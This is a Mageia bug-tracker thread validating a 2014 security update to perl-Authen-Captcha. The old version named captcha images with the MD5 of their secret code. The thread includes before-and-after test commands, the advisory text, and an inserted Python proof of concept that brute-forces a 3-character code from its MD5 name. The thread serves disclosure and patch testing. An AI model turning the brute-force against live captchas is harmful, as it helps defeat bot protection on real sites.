Fedora has issued an advisory on March 28: https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131155.html

Mageia 3 is also affected.
Whiteboard: (none) => MGA3TOO
packages available:
- perl-Authen-Captcha-1.24.0-1.mga3
- perl-Authen-Captcha-1.24.0-1.mga4

please validate & push.
CC: (none) => jquelin
Assignee: jquelin => qa-bugs
We'll need much more info to be able to do so, I'm afraid, Jerome.
Ok, here's a way to validate:

** before:

$ perl -MAuthen::Captcha -MDigest::MD5=md5_hex -E '($t,$c)=Authen::Captcha->new(data_folder=>".",output_folder=>".")->generate_code(3);say "md5: " . md5_hex($c);say "file: $t"'
md5: c0a7f3581049f2b0f9e3d5942e80944f
file: c0a7f3581049f2b0f9e3d5942e80944f

==> the 2 lines are the same (filename is the same as md5 sum of the code)

** after:

$ perl -MAuthen::Captcha -MDigest::MD5=md5_hex -E '($t,$c)=Authen::Captcha->new(data_folder=>".",output_folder=>".")->generate_code(3);say "md5: " . md5_hex($c);say "file: $t"'
md5: 83f989dd820bb3683ef6ff6b2bc7fd68
file: 69a8588b5d255cd4682b13b058b295b0

==> the filename is now different from the code md5

** advisory
===========================
An issue in previous versions of perl-Authen-Captcha is that the generated public string (file name of the picture) for the captcha is merely a checksum of the secret string. It is trivial to break such short strings even using google instead of a rainbow table.

This new version of perl-Authen-Captcha fixes the problem by producing a random filename for the captcha.
===========================
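The advisory above says the old public name (the picture's file name) is just the MD5 of the short secret code, which is cheap to invert. The following is an added example, not code from perl-Authen-Captcha or from this update: it models the old and new naming schemes and brute-forces a 3-character code from its MD5 name. The alphabet (lowercase letters plus digits), the sample code `q7z`, and the use of `secrets.token_hex` for the "random filename" are assumptions made for the demonstration; the real module's character set and String::Random output may differ, but any short code over a small alphabet gives a search space this size.

```python
"""Recover a captcha code from an MD5-derived public file name.

Added example, not code from perl-Authen-Captcha or the Mageia update.
Assumption: the captcha alphabet is lowercase letters plus digits. The
module's real character set may differ; the point is that the search
space for a 3-character code is tiny (36**3 = 46656 hashes here).
"""
import hashlib
import itertools
import secrets
import string

ALPHABET = string.ascii_lowercase + string.digits  # assumed alphabet


def public_name_old(code: str) -> str:
    """Pre-fix behaviour described in the advisory: the picture's file
    name is md5_hex(code), so the public string is a hash of the secret."""
    return hashlib.md5(code.encode()).hexdigest()


def public_name_new() -> str:
    """Post-fix behaviour: a random name with no relation to the code.
    The update uses String::Random; a CSPRNG hex token stands in here."""
    return secrets.token_hex(16)


def recover_code(public_name: str, length: int, alphabet: str = ALPHABET):
    """Return the code whose MD5 equals public_name, or None if no code of
    the given length over the alphabet hashes to it."""
    target = public_name.lower()
    for chars in itertools.product(alphabet, repeat=length):
        candidate = "".join(chars)
        if hashlib.md5(candidate.encode()).hexdigest() == target:
            return candidate
    return None


def demo() -> dict:
    """Constructed sample: a 3-character code like those in the report."""
    code = "q7z"  # constructed secret code, not taken from the report
    old_name = public_name_old(code)
    new_name = public_name_new()
    return {
        "code": code,
        "old_name": old_name,
        # With the old scheme the public name leaks the code outright.
        "recovered_from_old": recover_code(old_name, 3),
        "new_name": new_name,
        # With a random name the exhaustive search finds nothing.
        "recovered_from_new": recover_code(new_name, 3),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The exhaustive search over the assumed alphabet completes in well under a second, which is why the advisory can say a web search is enough: these hashes are already in public lookup tables. The second call shows why the fix works; a name that is independent of the code gives the search nothing to invert.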
Thanks Jerome, that's great :)
Whiteboard: MGA3TOO => MGA3TOO has_procedure
Testing complete mga4 64.

Is there a CVE for this? David, do you want to add any refs etc to the advisory?

Before
------
$ perl -MAuthen::Captcha -MDigest::MD5=md5_hex -E '($t,$c)=Authen::Captcha->new(data_folder=>".",output_folder=>".")->generate_code(3);say "md5: " . md5_hex($c);say "file: $t"'
md5: 202d4eac55a158965f90468b35d0d9e1
file: 202d4eac55a158965f90468b35d0d9e1

After
-----
There is an added require of perl-String-Random

# urpmi perl-Authen-Captcha
To satisfy dependencies, the following packages are going to be installed:
  Package                        Version      Release       Arch
(medium "Core Release")
  perl-String-Random             0.220.0      3.mga4        noarch
(medium "Core Updates Testing")
  perl-Authen-Captcha            1.24.0       1.mga4        noarch
26KB of additional disk space will be used.
112KB of packages will be retrieved.
Proceed with the installation of the 2 packages? (Y/n) y

$ perl -MAuthen::Captcha -MDigest::MD5=md5_hex -E '($t,$c)=Authen::Captcha->new(data_folder=>".",output_folder=>".")->generate_code(3);say "md5: " . md5_hex($c);say "file: $t"'
md5: 3c9d69741f38a95eebf16bacc6c718fb
file: 7adb03011a3636765f228afaaac03134
Whiteboard: MGA3TOO has_procedure => MGA3TOO has_procedure mga4-64-ok
No CVE listed by Fedora, and I'm not aware of one. The Fedora advisory itself should be in the References, I don't have any others: https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131155.html
OK thanks. Testing complete mga4 32. Testing the rest shortly.
Whiteboard: MGA3TOO has_procedure mga4-64-ok => MGA3TOO has_procedure mga4-32-ok mga4-64-ok
Testing complete mga3 32 & 64.

Advisory uploaded. Validating.

Could sysadmin please push to 3 & 4 updates. Thanks
Keywords: (none) => validated_update
Whiteboard: MGA3TOO has_procedure mga4-32-ok mga4-64-ok => MGA3TOO has_procedure advisory mga3-32-ok mga3-64-ok mga4-32-ok mga4-64-ok
CC: (none) => sysadmin-bugs
http://advisories.mageia.org/MGASA-2014-0167.html
Status: NEW => RESOLVED
CC: (none) => mageia
Resolution: (none) => FIXED